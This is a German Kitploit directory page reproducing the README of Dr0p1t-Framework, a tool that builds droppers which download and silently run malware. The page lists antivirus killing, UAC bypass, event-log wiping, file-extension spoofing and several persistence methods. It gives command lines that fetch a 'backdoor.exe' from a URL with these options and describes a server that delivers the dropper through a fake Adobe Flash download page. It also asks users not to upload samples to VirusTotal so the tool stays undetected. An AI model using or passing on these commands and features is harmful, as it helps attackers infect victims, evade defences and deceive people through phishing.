Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Dr0p1t-Framework — Ein Framework, das einen fortschrittlichen tarnenden Dropper erstellt, der die meisten AVs umgeht und viele Tricks hat. | Kitploit
Tools/GitHubGitHub/d4vinci/dr0p1t-framework
Privilege EscalationPayload-GenerierungPersistenzmechanismenExploitationIDS/IPS-UmgehungForensikPhishingMalware-AnalyseCommand and ControlSocial EngineeringPayload-EntwicklungAnti-Bot
1.5k3875vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

Ein Framework, das einen fortschrittlichen tarnenden Dropper erstellt, der die meisten AVs umgeht und viele Tricks hat.

Repository anzeigen

Derzeit nicht gewartet (Warten Sie auf die nächste Version)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

Haben Sie schon einmal von Trojan-Droppern gehört? Kurz gesagt, ein Dropper ist eine Art Malware, die andere Malware herunterlädt. Dr0p1t gibt Ihnen die Möglichkeit, einen unsichtbaren Dropper zu erstellen, der die meisten AVs umgeht und viele Tricks bietet (Vertrauen Sie mir :D ) ;)

Funktionen

+ Eigenschaften der generierten ausführbaren Datei:

  • Die Größe der ausführbaren Datei ist im Vergleich zu anderen Droppern, die auf die gleiche Weise erstellt wurden, kleiner.
  • Ausführbare Datei auf dem Zielsystem herunterladen und sie leise ausführen..
  • Selbstzerstörungsfunktion, sodass der Dropper sich selbst beendet und löscht, nachdem er seine Arbeit beendet hat.
  • Umgehung der Forensik, indem der Dropper alle erstellten Dateien und auch seinen Inhalt vor der Löschung bereinigt.
  • Ereignisprotokoll nach Beendigung löschen.

+ Framework-Eigenschaften:

  • Funktioniert mit Windows, Linux und jetzt auch mit OSX (Dank an @sm4sh3r)
  • Dr0p1t-Server-Funktion (Beta) – Sie können jetzt vom Browser aus arbeiten Siehe Arbeiten mit Dr0p1t-Server
  • Dr0p1t-Server hat eine Scam-Option (Beta) Siehe Arbeiten mit Dr0p1t-Server

+ Module:

  • Antivirus finden und beenden, bevor die Malware ausgeführt wird.
  • Die Möglichkeit, UAC zu deaktivieren.
  • Die Möglichkeit, Ihre Malware als Administrator auszuführen.
  • Vollständige Täuschung durch Ändern des Dateisymbols und der Dateierweiterung zu allem, was Sie möchten.
  • Unterstützung für ZIP-Dateien, sodass Sie Ihre ausführbare Datei vor dem Hochladen in eine ZIP-Datei komprimieren können.
  • Ausführen einer benutzerdefinierten ( batch|powershell|vbs ) Datei, die Sie vor dem Ausführen der ausführbaren Datei ausgewählt haben.
  • Bei der Ausführung von PowerShell-Skripten kann es die Ausführungsrichtlinie umgehen.
  • Verwendung von UPX, um den Dropper nach seiner Erstellung zu komprimieren.

+ Persistenzmodule:

  • Hinzufügen der ausführbaren Datei nach dem Herunterladen zum Start.
  • Hinzufügen der ausführbaren Datei nach dem Herunterladen zum Aufgabenplaner (UAC spielt keine Rolle).
  • Hinzufügen Ihrer Datei zum PowerShell-Benutzerprofil, sodass Ihre Datei jedes Mal heruntergeladen und ausgeführt wird, wenn powershell.exe ausgeführt wird, falls sie nicht existiert.

Screenshots

Unter Windows

Weitere anzeigen

Unter Linux (Kali Linux)

Weitere anzeigen

Unter OSX

Noch nicht vollständig getestet! Wir brauchen Mitwirkende und Tester 😄

Hilfemenü

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Beispiele

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Voraussetzungen

  • Python 2 oder Python 3.

Die empfohlene Version für Python 2 ist 2.7.x, die empfohlene Version für Python 3 ist 3.5.x, und verwenden Sie nicht 3.6, da es von PyInstaller noch nicht unterstützt wird.

Benötigte Abhängigkeiten für Linux

  • apt
  • Andere werden aus der install.sh-Datei installiert

Hinweis: Sie benötigen Root-Zugriff.

Benötigte Abhängigkeiten für Windows

  • pip
  • Module in windows_requirements.txt

Installation

Hier gibt es eine Liste mit allen offiziellen Videos zur Installation und Verwendung von Dr0p1t Playlist

  • Unter Linux
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • Unter Windows (nach dem Herunterladen der ZIP und Entpacken)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Hinweis: In Python 2.7 haben Sie kein pip, installieren Sie es daher zuerst mit dem get-pip.py-Skript [Google it]

Getestet auf:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Arbeiten mit Dr0p1t-Server

Hinweis: Der Server befindet sich noch in der Beta-Version und hat viele Funktionen, die hinzugefügt werden müssen, sowie ein besseres Design [Wir brauchen einen Designer, der beiträgt :D ]

Voraussetzungen

  • Stabile Internetverbindung.
  • Port 5000 wird nicht verwendet und die Firewall ist so konfiguriert, dass sie Verbindungen von dort nicht blockiert.

Installation und Ausführung des Servers

Unter Linux und Windows ist es gleich, nachdem Sie Dr0p1t gemäß den oben genannten Schritten installiert haben, installieren Sie die Module in server_requirements.txt mit pip wie folgt:

root@kitploit:~
python -m pip install -r server_requirements.txt

Jetzt führen wir unser Server-Skript aus:

root@kitploit:~
python Dr0p1t_Server.py

Nach dem Ausführen des Server-Skripts beginnt es, auf alle Verbindungen auf Port 5000 mit Flask zu hören.

Um den Server von Ihrem Gerät aus zu nutzen, öffnen Sie im Browser entweder 127.0.0.1:5000 oder [Ihre IP]:5000.

Um ihn von anderen Geräten im LAN zu öffnen, öffnen Sie [Ihre lokale IP]:5000 und für andere Geräte im WAN öffnen Sie [Ihre globale IP]:5000, stellen Sie jedoch zuerst sicher, dass Sie Ihren Router so konfiguriert haben, dass er Port 5000 an Sie weiterleitet.

Nach dem Öffnen der Serverseite sehen Sie eine einfache Website mit schlichtem Design, die Sie nach den benötigten Daten fragt Siehe Server-Screenshots

Dann übermitteln Sie die Daten, die dann durch einige Prozesse verifiziert werden, dann wird die exe-Datei generiert und Sie werden auf eine Seite weitergeleitet, die Ihnen den Scam-Link angibt.

Nach dem Betreten des Links sehen Sie einen Scam zum Herunterladen des Droppers, der standardmäßig die Adobe Flash Download-Seite ist.

Um den Scam durch Ihren eigenen zu ersetzen, ersetzen Sie den Inhalt der Datei "Scam.html" durch Ihren, aber denken Sie an die Variablen (Entfernen Sie sie nicht).

Server-Screenshots

Weitere für Windows anzeigen Weitere für Linux anzeigen

Kein Verteilen-Scan (Bitte nicht mit VirusTotal scannen :3)

Todo Siehe diesen Link

Kontakt

  • Twitter

Spende

Wenn dieses Tool für Sie nützlich war, können Sie mir gerne mit einem Kaffee danken :)

Coffee

Haftungsausschluss

Das Dr0p1t-Framework ist nicht verantwortlich für Missbrauch und illegale Zwecke. Verwenden Sie es nur für Pentests oder Bildungszwecke !!!

Das Kopieren von Code aus diesem Framework oder die Verwendung in einem anderen Tool ist erlaubt, solange Sie angeben, woher Sie ihn haben 😄

Pull-Requests sind immer willkommen :D

Tool herunterladen